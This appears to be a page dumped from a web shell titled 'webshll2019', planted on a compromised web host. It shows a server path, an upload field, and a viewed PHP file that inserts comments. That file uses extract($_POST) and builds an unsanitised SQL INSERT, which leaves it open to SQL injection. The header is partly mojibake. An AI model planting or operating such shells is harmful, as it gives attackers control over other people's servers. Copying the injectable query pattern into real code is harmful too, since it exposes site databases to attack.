?

áEÓê¤ÎïLwebshll2019

Current Path : /home/webyoo/www/backup/allback/kanity.com/save0807bh/
Upload File :
Current File : /home/webyoo/www/backup/allback/kanity.com/save0807bh/insert_comm.php

<?php
 
include "start.php";
 
extract($_POST);

if($comm != '')
{
$sql_up=mysql_query("INSERT INTO kan_comments SET fk_user='$iduser', fk_post='$id', commentaire='$comm'");
	echo "Insertion réussie!";
}else
{
	echo "L'insertion a echouée!";
}
?>



web shell, Coded By 2019